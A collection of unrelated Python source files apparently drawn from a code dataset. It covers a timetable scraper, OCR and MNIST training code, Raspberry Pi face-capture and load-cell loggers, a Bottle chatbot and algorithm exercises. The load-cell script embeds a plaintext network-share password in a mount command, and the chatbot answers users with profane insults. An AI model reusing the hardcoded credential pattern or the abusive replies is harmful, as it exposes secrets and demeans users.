schedule_url\n }\n self.session.headers.update(headers)\n schedule_html = self.session.post(schedule_url, data)\n page = pq(schedule_html.text)\n print(page)\n trs = page('tr')\n tr_len = 0\n try:\n for tr in trs[2:13]:\n if tr_len == 0:\n tr_len = len(tr)\n if tr_len == len(tr):\n jie = tr[1].text()\n jie = re.findall(r'\\d+', jie)\n mon = pq(tr[2]).text()\n tues = pq(tr[3]).text()\n wed = pq(tr[4]).text()\n thur = pq(tr[5]).text()\n fri = pq(tr[6]).text()\n sat = pq(tr[7]).text()\n sun = pq(tr[-1]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.next_term_schedule.append(schedule)\n elif len(tr) == tr_len - 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n print(jie)\n mon = pq(tr[1]).text()\n tues = pq(tr[2]).text()\n wed = pq(tr[3]).text()\n thur = pq(tr[4]).text()\n fri = pq(tr[5]).text()\n sat = pq(tr[6]).text()\n sun = pq(tr[-1]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.next_term_schedule.append(schedule)\n elif len(tr) != tr_len and len(tr) != 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n schedule = copy.deepcopy(self.schedule[-1])\n schedule['jie'] = jie\n self.next_term_schedule.append(schedule)\n except Exception as e:\n log(e, \"*****获取下学期课表信息失败\")\n\n def save_score(self, uid):\n status = self.get_score()\n with db.auto_commit():\n db.session.query(UserScore).filter(UserScore.uid == uid).delete()\n if status:\n for i in self.score:\n user_score = UserScore()\n score_dict = i\n score_dict['uid'] = uid\n user_score.setattr(score_dict)\n with db.auto_commit():\n db.session.add(user_score)\n return True\n else:\n return False\n\n def save_schedule(self, uid):\n self.get_schedule()\n with db.auto_commit():\n db.session.query(UserSchedule).filter(UserSchedule.uid == uid).delete()\n for i in self.schedule:\n user_schedule = UserSchedule()\n schedule_dict = i\n schedule_dict['uid'] = uid\n schedule_dict['xh'] = self.xh\n schedule_dict['name'] = self.name\n user_schedule.setattr(schedule_dict)\n with db.auto_commit():\n db.session.add(user_schedule)\n\n def save_next_term_schedule(self, uid):\n self.get_next_schedule()\n with db.auto_commit():\n db.session.query(UserNextTermSchedule).filter(UserNextTermSchedule.uid == uid).delete()\n for i in self.next_term_schedule:\n user_schedule = UserNextTermSchedule()\n schedule_dict = i\n schedule_dict['uid'] = uid\n schedule_dict['xh'] = self.xh\n schedule_dict['name'] = self.name\n user_schedule.setattr(schedule_dict)\n with db.auto_commit():\n db.session.add(user_schedule)\n","sub_path":"app/spider/zjcm/zjcm_spider.py","file_name":"zjcm_spider.py","file_ext":"py","file_size_in_byte":12825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266349639","text":"from fabdeploy.lib.utils import _AttrDict, _is_host\nfrom fabric.api import run,sudo,env,task \nfrom fabdeploy.servers import get_server\n\n@task\ndef configure():\n \"\"\"\n configures apache based on Host Type\n \"\"\"\n config = _AttrDict(\n wsgi = env.wsgi_path,\n home = env.home,\n root = env.path,\n admin = env.admin,\n server = ''.join(['www.',env.url]),\n venv_path = ''.join([env.home,'/.virtualenvs/',env.project_name]),\n errorlog = ''.join([env.log_path,'/error.log']),\n accesslog = ''.join([env.log_path,'/access.log']),\n )\n\n # get server and set configuration files\n server = get_server()\n server.configure(config)\n\ndef restart():\n \"\"\"\n restart apache server\n \"\"\"\n sudo('/etc/init.d/apache2 restart')\n","sub_path":"apache.py","file_name":"apache.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"450687622","text":"import sys\nfrom multiprocessing import Lock, cpu_count\nfrom random import randint\nfrom time import sleep\n\nfrom .runner import runner\n\nfrom ..helpers.job import job as pjob\n\nlock = Lock()\n\nclass runner_queue (runner):\n\t\"\"\"\n\tThe base queue runner class\n\t@static variables:\n\t\tmaxsubmit: Maximum jobs submitted at one time. Default cpu_count()/2\n\t\tinterval: The interval to submit next batch of jobs. Default 30\n\t\"\"\"\n\t\n\tmaxsubmit = int (cpu_count()/2)\n\tinterval = 30 \n\t\n\tdef wait(self):\n\t\t\"\"\"\n\t\tWait for the job to finish\n\t\t\"\"\"\n\t\tif self.job.rc() == pjob.FAILED_RC: \n\t\t\treturn\n\t\t\t\n\t\tferr = open (self.job.errfile)\n\t\tfout = open (self.job.outfile)\n\t\tif self.p:\n\t\t\tself.p.wait()\n\t\t\tself.getpid()\n\t\t\tif self.job.proc.echo:\n\t\t\t\tlock.acquire()\n\t\t\t\tsys.stderr.write (ferr.read())\n\t\t\t\tsys.stdout.write (fout.read())\n\t\t\t\tlock.release()\n\t\t\n\t\tif not self.isRunning():\n\t\t\tferr.close()\n\t\t\tfout.close()\n\t\t\treturn\n\t\t\n\t\twhile self.job.rc() == pjob.EMPTY_RC:\n\t\t\tsleep (randint(20, 40))\n\t\t\tif self.job.proc.echo:\n\t\t\t\tlock.acquire()\n\t\t\t\tsys.stderr.write (''.join(ferr.readlines()))\n\t\t\t\tsys.stdout.write (''.join(fout.readlines()))\n\t\t\t\tlock.release()\n\t\t\t\t\n\t\t\tif not self.isRunning():\n\t\t\t\tbreak\n\t\t\t\n\t\tferr.close()\n\t\tfout.close()\n","sub_path":"pyppl/runners/runner_queue.py","file_name":"runner_queue.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"63303424","text":"import argparse\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nimport base_arg\nfrom model import CRNN\nfrom dataset import OCRDataLoader, map_and_count\n\nparser = argparse.ArgumentParser(parents=[base_arg.parser])\nparser.add_argument(\"-ta\", \"--train_annotation_paths\", type=str, required=True, help=\"The path of training data annnotation file.\")\nparser.add_argument(\"-va\", \"--val_annotation_paths\", type=str, help=\"The path of val data annotation file.\")\nparser.add_argument(\"-b\", \"--batch_size\", type=int, default=128, help=\"Batch size.\")\nparser.add_argument(\"-e\", \"--epochs\", type=int, default=5, help=\"Num of epochs to train.\")\nparser.add_argument(\"-r\", \"--learning_rate\", type=float, default=0.001, help=\"Learning rate.\")\nparser.add_argument(\"--checkpoint\", type=str, help=\"The checkpoint path. (Restore)\")\nparser.add_argument(\"--max_to_keep\", type=int, default=5, help=\"Max num of checkpoint to keep.\")\nparser.add_argument(\"--save_freq\", type=int, default=1, help=\"Save and validate interval.\")\nargs = parser.parse_args()\n\nwith open(args.table_path, \"r\") as f:\n INT_TO_CHAR = [char.strip() for char in f]\nNUM_CLASSES = len(INT_TO_CHAR)\nBLANK_INDEX = NUM_CLASSES - 1 # Make sure the blank index is what.\n\n@tf.function\ndef train_one_step(model, X, Y, optimizer):\n with tf.GradientTape() as tape:\n y_pred = model(X, training=True)\n loss = tf.nn.ctc_loss(labels=Y,\n logits=tf.transpose(y_pred, perm=[1, 0, 2]),\n label_length=None,\n logit_length=[y_pred.shape[1]]*y_pred.shape[0],\n blank_index=BLANK_INDEX)\n loss = tf.reduce_mean(loss)\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(grads_and_vars=zip(grads, model.trainable_variables))\n return loss\n\n@tf.function\ndef val_one_step(model, X, Y):\n y_pred = model(X, training=False)\n loss = tf.nn.ctc_loss(labels=Y,\n logits=tf.transpose(y_pred, perm=[1, 0, 2]),\n label_length=None,\n logit_length=[y_pred.shape[1]]*y_pred.shape[0],\n blank_index=BLANK_INDEX)\n loss = tf.reduce_mean(loss)\n decoded, neg_sum_logits = tf.nn.ctc_greedy_decoder(inputs=tf.transpose(y_pred, perm=[1, 0, 2]),\n sequence_length=[y_pred.shape[1]]*y_pred.shape[0],\n merge_repeated=True)\n return decoded, loss\n\nif __name__ == \"__main__\":\n train_dataloader = OCRDataLoader(args.train_annotation_paths, \n args.image_height, \n args.image_width, \n table_path=args.table_path,\n blank_index=BLANK_INDEX,\n shuffle=True, \n batch_size=args.batch_size)\n print(\"Num of training samples: {}\".format(len(train_dataloader)))\n if args.val_annotation_paths:\n val_dataloader = OCRDataLoader(args.val_annotation_paths,\n args.image_height,\n args.image_width,\n table_path=args.table_path,\n blank_index=BLANK_INDEX,\n batch_size=args.batch_size)\n print(\"Num of val samples: {}\".format(len(val_dataloader)))\n print(\"Num of classes: {}\".format(NUM_CLASSES))\n print(\"Blank index is {}\".format(BLANK_INDEX))\n localtime = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\n print(\"Start at {}\".format(localtime))\n\n model = CRNN(NUM_CLASSES, args.backbone)\n model.summary()\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(args.learning_rate,\n decay_steps=10000,\n decay_rate=0.96,\n staircase=True)\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)\n\n checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)\n if args.checkpoint:\n localtime = args.checkpoint.rstrip(\"/\").split(\"/\")[-1]\n manager = tf.train.CheckpointManager(checkpoint, directory=\"./tf_ckpts/{}\".format(localtime), max_to_keep=args.max_to_keep)\n summary_writer = tf.summary.create_file_writer(\"./logs/{}\".format(localtime))\n checkpoint.restore(manager.latest_checkpoint)\n if manager.latest_checkpoint:\n print(\"Restored from {}\".format(manager.latest_checkpoint))\n else:\n print(\"Initializing from scratch\")\n\n avg_loss = tf.keras.metrics.Mean(name=\"train_loss\")\n val_avg_loss = tf.keras.metrics.Mean(name=\"val_loss\")\n\n for epoch in range(1, args.epochs + 1):\n with summary_writer.as_default():\n for X, Y in train_dataloader():\n loss = train_one_step(model, X, Y, optimizer)\n tf.summary.scalar(\"train_loss\", loss, step=optimizer.iterations)\n avg_loss.update_state(loss)\n print(\"[{} / {}] Mean train loss: {}\".format(epoch, args.epochs, avg_loss.result()))\n avg_loss.reset_states()\n if (epoch - 1) % args.save_freq == 0:\n saved_path = manager.save(checkpoint_number=epoch)\n print(\"Model saved to {}\".format(saved_path))\n if args.val_annotation_paths:\n num_correct_samples = 0\n for X, Y in val_dataloader():\n decoded, loss = val_one_step(model, X, Y)\n count = map_and_count(decoded, Y, INT_TO_CHAR)\n val_avg_loss.update_state(loss)\n num_correct_samples += count\n tf.summary.scalar(\"val_loss\", val_avg_loss.result(), step=epoch)\n tf.summary.scalar(\"val_accuracy(line, greedy decoder)\", num_correct_samples / len(val_dataloader), step=epoch)\n print(\"[{} / {}] Mean val loss: {}\".format(epoch, args.epochs, val_avg_loss.result()))\n print(\"[{} / {}] Accuracy(line, greedy decoder): {:.2f}\".format(epoch, args.epochs, num_correct_samples / len(val_dataloader)))\n val_avg_loss.reset_states()","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231614572","text":"# Learn Python the Hard Way\n# Exercise 17: More Files\n# 09/19/2016 \n# Please note that in order to use this script you have to\n# use the console input format of:\n# > python SCRIPTNAMEHERE.py FROMFILEHERE.txt # \t\t TOFILEHERE.txt\n\n\nfrom sys import argv\nfrom os.path import exists \n\nscript, from_file, to_file = argv \n\n\nprint(\"Copying from {from_file} to %(to_file)\")\n\nin_file = open(from_file)\nindata = in_file.read()\n\nprint(\"The input data is %d bytes long\" % len(indata))\n\nprint(\"Checking to make sure the destination file is present %s\" % exists(to_file))\n\nprint(\"Writing data to file...\")\n\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nprint(\"Done!!!\")\n\nout_file.close()\nin_file.close()","sub_path":"Notes/ReadingNotes/Books/LPTHW/Exercises/LPTHWCh17Exercise.py","file_name":"LPTHWCh17Exercise.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"251774069","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MNIST_2NN(nn.Module):\n \"\"\"\n A simple multilayer-perceptron with 2-hidden layers with 200 units each\n using ReLu activations\n\n Total Expected Params: 199,210\n \"\"\"\n def __init__(self):\n super(MNIST_2NN, self).__init__()\n\n self.fc1 = nn.Linear(28*28, 200)\n self.fc2 = nn.Linear(200, 200)\n self.fc3 = nn.Linear(200, 10)\n\n def forward(self, x):\n x = torch.flatten(x, 1)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n out = self.fc3(x)\n\n return x","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"611766619","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n#人物を検知した時に画像を撮影して撮��画像をS3に送信する\n\nimport boto3\nimport json\nimport cv2\nimport datetime\nimport time\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport os\nimport argparse\nimport shutil\n\n#人感センサ設定情報\nINTAVAL = 3\nSLEEPTIME = 5\nSENSOR_PIN = 18\nst = time.time()-INTAVAL\n\nGPIO.cleanup()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(SENSOR_PIN, GPIO.IN)\n\n#正面顔のHaar-like特徴分類器の保存先\nCASCADE_PASS = 'models/haarcascade_frontalface_alt.xml'\n\n#AWS関連設定情報\nREGION = 'us-east-1'\nACCESS_KEY = 'AWSのアクセスキーを入力'\nSECRET_KEY = 'AWSのシークレットアクセスキーを入力'\nIMG_NAME = 'photo.jpg'\nIMG_PASS = '~/workspace/' + IMG_NAME\nBUCKET_NAME = 'バケット名'\n\ndef camera(NUM): #webカメラで画像を1枚撮影し「NUM.jpg」として保存\n c = cv2.VideoCapture(0)\n r, img = c.read()\n T = datetime.datetime.now()\n NAME = str(NUM) + '.jpg'\n cv2.imwrite(NAME, img)\n\ndef photo_take(): #0.5秒ごとに画像を10枚撮影する。画像は\"1.jpg\"~\"10.jpg\"として保存\n for num in range(1,11):\n print (num)\n camera(num)\n time.sleep(0.5)\n\ndef trim():\n color = (255, 255, 255) #白\n #ファイル読み込み\n image = cv2.imread(PHOTO_NAME)\n #グレースケール変換\n image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #カスケード分類器の特徴量を取得する\n cascade = cv2.CascadeClassifier(CASCADE_PASS)\n #物体認識(顔認識)の実行\n facerect = cascade.detectMultiScale(\n image_gray, scaleFactor=1.1, minNeighbors=1, minSize=(1, 1))\n if len(facerect) <= 0:\n exit()\n #検出した顔を囲む矩形の作成\n for rect in facerect:\n cv2.rectangle(image, tuple(rect[0:2]),tuple(rect[0:2]+rect[2:4]), color, thickness=2)\n #認識結果の保存\n cv2.imwrite(\"detected.jpg\", image)\n for rect in facerect:\n #cv2.imwrite('demo.jpg', image[rect])\n print (rect)\n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n \n # img[y: y + h, x: x + w] \n cv2.imwrite('photo.jpg', image[y:y+h, x:x+w])\ndef photo_up(): #AWS S3に画像\"photo.jpg\"をアップ\n s3 = boto3.resource('s3',region_name=REGION,aws_access_key_id=ACCESS_KEY,aws_secret_access_key=SECRET_KEY)\n data = open(IMG_NAME, 'rb')\n s3.Bucket(BUCKET_NAME).put_object(Key=IMG_NAME, Body=data)\n\n\nprint (\"人感センサー起動中\")\n\nwhile True:\n face_cascade = cv2.CascadeClassifier(CASCADE_PASS)\n print (\"...\")\n if(GPIO.input(SENSOR_PIN) == GPIO.HIGH) and (st + INTAVAL < time.time()):\n st = time.time()\n print(\"人を感知しました。撮影します。\")\n photo_take()\n print(\"顔を探しています...\")\n for n in range(1,11):\n PHOTO_NAME = str(n) + '.jpg'\n img = cv2.imread(PHOTO_NAME)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #顔を検知\n #顔を検知したらその位置座標が多次元配列に保存される\n faces = face_cascade.detectMultiScale(gray) \n FACES = np.array(faces)\n if (FACES.size > 0): #顔が見つかったとき\n print(\"顔を見つけました。トリミングします。\")\n trim()\n print(\"画像をAWSへ送ります。\")\n photo_up()\n print(\"送信完了\")\n break\n else:\n print(\"なし\")\n\n time.sleep(SLEEPTIME)\n","sub_path":"Raspi_camera_edit.py","file_name":"Raspi_camera_edit.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297660228","text":"\"\"\"\nThis is the template server side for ChatBot\n\"\"\"\nfrom bottle import route, run, template, static_file, request\nimport json\nimport random\n\nswear_words=[\"fuck\",\"shit\",\"prick\",\"cunt\", \"dumbass\",\"asshole\",\"twat\"]\n\ncurse_response=[\"you diseased rhinocerus' pisel\", \"You're so ugly you make the mirror cry\", \"screw you\", \"get lost\", \"fuck you\",\"u twat\"]\nstock_responses=[\"Hello, you may call me Boto, Gad, Hobart, I go by many names.\",\"If you're having a bad day, and you wish to vent, then we can have a curse out match (I won't tell anyone)\", \"Ask me the weather??\", \"How are you feeling?\", \"What is your favourite food\",\"okay, thank you\"]\n\nused_stock=[]\nused_curses=[]\n\njoke=\"A man walks into a bar.....ouch\"\nanimations=[\"afraid\", \"bored\", \"confused\",\"crying\",\"dancing\",\"dog\",\"excited\", \"giggling\",\"heartbroke\",\"inlove\",\"laughing\",\"money\",\"no\",\"ok\",\"takeoff\",\"waiting\"]\n\n\n@route('/', method='GET')\ndef index():\n return template(\"chatbot.html\")\n\n\n@route(\"/chat\", method='POST')\ndef chat():\n user_message = request.POST.get('msg')\n rsp=process_msg(user_message)\n return json.dumps({\"animation\": choose_mation(), \"msg\": rsp})\n\n\n@route(\"/test\", method='POST')\ndef chat():\n user_message = request.POST.get('msg')\n return json.dumps({\"animation\": \"inlove\", \"msg\": \"You are not my friend\"})\n\n\n@route('/js/', method='GET')\ndef javascripts(filename):\n return static_file(filename, root='js')\n\n\n@route('/css/', method='GET')\ndef stylesheets(filename):\n return static_file(filename, root='css')\n\n\n@route('/images/', method='GET')\ndef images(filename):\n return static_file(filename, root='images')\n\n\ndef main():\n run(host='localhost', port=7000)\n\ndef process_msg(msg):\n if check_if_swore(msg):\n return choose_curse(curse_response)\n elif msg==\"how are you?\":\n return \"fine thanks\"\n elif msg[-1]==\"?\":\n return \"My repotoire of understanding is slightly low- je ne comprends pas\"\n elif asked_joke(msg):\n return tell_joke()\n elif asked_for_weather(msg):\n return \"HaHaHa, the weather you ask, pffft,I ain't that advanced\"\n else:\n return choose_stock()\n\n\n\n\ndef check_if_swore(msg):\n words=msg.split()\n for word in words:\n if word in swear_words:\n return True\n return False\n\n\n\ndef choose_curse(type):\n global curse_response\n global used_curses\n length=len(curse_response)-1\n if length==-1:\n curse_response=used_stock\n index=random.randint(0,length)\n rsp=curse_response[index]\n used_curses.append(rsp)\n del curse_response[index]\n return rsp\n\ndef choose_stock():\n global stock_responses\n global used_stock\n length=len(stock_responses)-1\n if length==-1:\n stock_responses=used_stock\n index=random.randint(0,length)\n rsp=stock_responses[index]\n used_stock.append(rsp)\n del stock_responses[index]\n return rsp\n\ndef choose_mation():\n length=(len(animations))-1\n index=random.randint(0,length)\n return animations[index]\ndef asked_joke(msg):\n if \"joke\" in msg:\n return True\n else:\n return False\ndef tell_joke():\n return joke\n\n\ndef asked_for_weather(msg):\n if \"weather\" in msg:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"boto.py","file_name":"boto.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534124077","text":"\nimport unittest\n\nclass Solution(object):\n def maxArea(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n i = 0\n j = len(height) - 1\n water = 0\n while i < j:\n minh = min(height[i], height[j])\n water = max(water, minh * (j - i))\n while(height[i] <= minh and i < j):\n i += 1\n while(height[j] <= minh and i < j):\n j -= 1\n return water\n\nclass TestSolution(unittest.TestCase):\n def test_1(self):\n s = Solution()\n self.assertEqual(12, s.maxArea([1, 2, 3, 2, 3, 2, 5, 1]))\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"container-with-most-water/lcode11.py","file_name":"lcode11.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326969614","text":"from GraphAPI import Graph\nfrom heapq import *\nfrom networkx.algorithms import *\nimport networkx as nx \nimport time \n\nclass Dijkstra(object):\n '''Dijkstra solution of shortest path'''\n\n def __init__(self, graph):\n #initialize the graph input\n self.graph = graph\n\n def solver(self, source):\n #create prioirty queue\n #Q<-makePQ()\n priorityQ = []\n #set distance from source to all the node as infinity\n #for each node u that is not s do: insert(Q,(u,infinity))\n dist = {x: float(\"inf\") for x in self.graph.bag}\n #set distance to source to be 0\n #insert(Q,(s,0))\n dist[source] = 0\n #push all the nodes to priority queue and set the parent of them as None\n \n #create a path tree to resturn in the end\n path = {}\n for node in self.graph.bag:\n heappush(priorityQ, (dist[node], node))\n path[node] = None\n #use visisted to keep track of nodes we visited \n #X<-emptyset\n visited = []\n \n\n \n #while queue is not empty\n #for i = 1 to |V| do\n while priorityQ:\n #extract node with minimum distance value\n #(v, dist(s, v)) = extractMin(Q)\n d, node = heappop(priorityQ)\n #add this node to visited set\n #X = X U {v}\n visited.append(node)\n #loop through neighbors of the current node\n #for each u in Adj(v) do\n for neighbor, weight in self.graph.adjacent[node]:\n #if neighbor has not been visited\n if neighbor not in visited: \n #relax the edge \n #decreaseKey(Q,(u,min(dist(s,u),dist(s,v)+l(v,u))))\n if dist[neighbor] > d + weight:\n dist[neighbor] = d + weight\n #set the parent of neighbor to be node\n path[neighbor] = node \n #push the neighbor to priority queue, which decrease key\n heappush(priorityQ, (dist[neighbor], neighbor))\n return dist, path \n\n'''testing\nif __name__ == \"__main__\":\n\n graph = Graph()\n\n graph.addNode(1)\n graph.addNode(2)\n graph.addNode(3)\n\n\n graph.addWeightedEdge(1, 2, 5)\n graph.addWeightedEdge(2, 3, -10)\n graph.addWeightedEdge(1, 3, 2)\n\n\n \n solution = Dijkstra(graph)\n\n dist, path = solution.solver(1)\n print dist\n print path \n\n'''\n\n \n\n\n \n\n","sub_path":"Shortest-Path-Python/Dijkstra.py","file_name":"Dijkstra.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"90656397","text":"#!/usr/bin/env python\r\n\r\n'''\r\nThis script is built to run (((4))) LoadStar Load Cells with attached peripherals (channel LED and channel export button).\r\nThe script is easily scalable but due to the number of GPIO pins on a Raspberry Pi it is recommended that\r\nONE Raspberry Pi is assigned for every four load cells. To build another sensor set this script can easily be copied to a \r\nnew Pi hard drive and only a few parameters need to be changed:\r\n\r\n(1) Folder Location for each new cell\r\n(2) Thresholds for each cell channel\r\n(3) Press Number\r\n\r\nWith the exception of the thresholds, the parameters are changed in the function arguments at the very end of the script.\r\nThe Thesholds are labeled as constant values in the beginning of the script.\r\n'''\r\nfrom multiprocessing import Process\r\nimport time\r\nimport datetime\r\nimport serial\r\nimport os\r\nimport RPi.GPIO as GPIO\r\nfrom openpyxl import Workbook, formatting, styles\r\nfrom openpyxl.styles import Alignment\r\nfrom openpyxl.styles.borders import Border, Side, BORDER_THICK\r\nfrom openpyxl.chart import BarChart, Series, Reference\r\nfrom numpy import column_stack\r\n\r\n#Connect to Network Drive (Pi Must have a folder call EEC_Network in the /home/pi/ directory)\r\nos.system('sudo mount.cifs //eec-srv-16/Testing /home/pi/EEC_Network -o user=Testing,password=R3stricted#')\r\n\r\n'''\r\nInitializing time variables, stop_time is when the code will exit and shutdown the pi, local_time_init \r\ngets the time relative to the Pi timezone, and timestmp creates a time stamp that will be added to \r\nthe excel file name on export. \r\n'''\r\nstop_time = int(time.strftime('%H%M%S'))\r\nlocal_time_init = time.localtime()\r\ntimestmp = time.strftime('%m-%d-%Y_%H%M', local_time_init)\r\n\r\n#Initializing GPIO pins as INPUTs/OUTPUTs and stating their initial conditions\r\nINPUTS = [11, 12, 13, 15, 16, 18, 19, 22]\r\nOUTPUTS = [31, 33, 35, 37]\r\nGPIO.setmode(GPIO.BOARD) #Pins referred to as their board number\r\nGPIO.setwarnings(False) #Supresses Terminal Warning that is otherwise unavoidable\r\nfor i in INPUTS:\r\n GPIO.setup(i, GPIO.IN)\r\n GPIO.input(i)\r\nfor i in OUTPUTS:\r\n GPIO.setup(i, GPIO.OUT)\r\n GPIO.output(i, 0)\r\n\r\n#CONSTANTS\r\nThresh1 = 5 #Force Threshold for Press1\r\nThresh2 = 5 #Force Threshold for Press2\r\nThresh3 = 5 #Force Threshold for Press3\r\nThresh4 = 5 #Force Threshold for Press4\r\nShortSleep = 1 #Sleep after Pass\r\nLongSleep = 3 #Sleep after Fail\r\n\r\n'''\r\nDefining serial port function. Create new port by passing the path to the device into the function.\r\nThe path can be found by navigating to the dev folder (cd /dev), listing the contents of the folder (ls)\r\nand seeing what ttyUSB* devices are listed. A helpful linux command is to enter (ls ttyUSB* in place of ls)\r\nwhich will list only ttyUSB devices. \r\n'''\r\ndef serdev(a):\r\n b = serial.Serial(a, 9600, timeout = None)\r\n if b.isOpen() == False:\r\n b.open()\r\n return b\r\nser1 = serdev('/dev/ttyUSB0')\r\nser2 = serdev('/dev/ttyUSB1')\r\nser3 = serdev('/dev/ttyUSB2')\r\nser4 = serdev('/dev/ttyUSB3')\r\n\r\n#Taring Variable (init). Create new variable by passing the serial port into the function\r\ndef serinit(a):\r\n a.write(('W\\r').encode('utf-8'))\r\n a.flush()\r\n b = float((a.readline()).decode('utf-8'))\r\n return b\r\ninit1 = serinit(ser1)\r\ninit2 = serinit(ser2)\r\ninit3 = serinit(ser3)\r\ninit4 = serinit(ser4)\r\n\r\n#This function makes the respective LED flash 3 times to indicate excel export\r\ndef Export_Indicator(LED_Pin):\r\n for i in range(3):\r\n GPIO.output(LED_Pin, 1)\r\n time.sleep(0.25)\r\n GPIO.output(LED_Pin, 0)\r\n time.sleep(0.25)\r\n\r\n#Creating Empty Lists to Append Data to for Excel Calculation\r\n#PRESS 1\r\nForce1 = [] #Log of Forces/Operations\r\nPF1 = [] #Log of Operation Results (Pass/Fail)\r\n#PRESS 2\r\nForce2 = [] #Log of Forces/Operations\r\nPF2 = [] #Log of Operation Results (Pass/Fail)\r\n#PRESS 3\r\nForce3 = [] #Log of Forces/Operations\r\nPF3 = [] #Log of Operation Results (Pass/Fail)\r\n#PRESS 4\r\nForce4 = [] #Log of Forces/Operations\r\nPF4 = [] #Log of Operation Results (Pass/Fail)\r\n\r\n#Excel export function. A, B, C, and D are defined by the Press() function, later.\r\ndef Excel(a, b, c, d):\r\n #Create Data For Excel\r\n PCount = b.count(\"Pass\") #counts passes\r\n FCount = b.count(\"Fail\") #counts failures\r\n FPerc = ((FCount / len(b)) * 100) #creates a percentage of failures to total operations\r\n FAvg = sum(a) / len(a) #calculates average forced required for press fit\r\n #Start Workbook\r\n wb = Workbook()\r\n #Creating Sheet 1\r\n ws1 = wb.active\r\n ws1.title = d\r\n #Entering Headers\r\n ws1['A1'] = 'Force'\r\n #Turning Data Into An Array of Vectors (Columns in Excel)\r\n data_out1 = column_stack([a])\r\n #Writing to Excel\r\n for row in data_out1.tolist():\r\n ws1.append(row)\r\n ws1['C2'] = 'Total Pass'\r\n ws1['C7'] = 'Total Fail'\r\n ws1['C12'] = 'Percent Fail'\r\n ws1['C17'] = 'Average Force'\r\n ws1['E2'] = PCount\r\n ws1['E7'] = FCount\r\n ws1['E12'] = FPerc\r\n ws1['E17'] = '%.4f' %FAvg\r\n #Merging Cells\r\n ws1.merge_cells('C2:D3')\r\n ws1.merge_cells('E2:E3')\r\n ws1.merge_cells('C7:D8')\r\n ws1.merge_cells('E7:E8')\r\n ws1.merge_cells('C12:D13')\r\n ws1.merge_cells('E12:E13')\r\n ws1.merge_cells('C17:D18')\r\n ws1.merge_cells('E17:E18')\r\n #Creating Alignment Properties of Cells\r\n CELLS = ['A1', 'C2', 'E2', 'C7', 'E7', 'C12', 'E12', 'C17', 'E17'] #List of cells subject to alignment\r\n #For Loop to Align the Cells in CELLS\r\n for i in CELLS:\r\n ws1[i].alignment = Alignment(horizontal='center', vertical='center')\r\n #Defining Border Properties and Applying them with For Loops\r\n thick_border = Border(\r\n left=Side(border_style=BORDER_THICK, color='00000000'),\r\n )\r\n for j in range(17):\r\n ws1.cell(row = j + 2, column = 3).border = thick_border\r\n ws1.cell(row = j + 2, column = 3).border = thick_border\r\n j += 1\r\n for j in range(17):\r\n ws1.cell(row = j + 2, column = 6).border = thick_border\r\n ws1.cell(row = j + 2, column = 6).border = thick_border\r\n j += 1\r\n #Creating Bar Graph\r\n chart1 = BarChart()\r\n chart1.type = \"col\"\r\n chart1.style = 1\r\n chart1.title = None\r\n chart1.y_axis.title = 'Force'\r\n chart1.x_axis.title = ''\r\n ChartData = Reference(ws1, min_col=1, min_row=2, max_row=len(a)+1, max_col=1)\r\n chart1.add_data(ChartData, titles_from_data=None)\r\n chart1.legend = None\r\n chart1.height = 15\r\n chart1.width = 30\r\n ws1.add_chart(chart1, \"G5\")\r\n #Saving/Closing\r\n wb.save(c)\r\n\r\n'''\r\nPress function takes arguments in the form:\r\n\r\n(channel, serial port, BreakBeam Pin, Button Pin, LED Pin, taring variable, 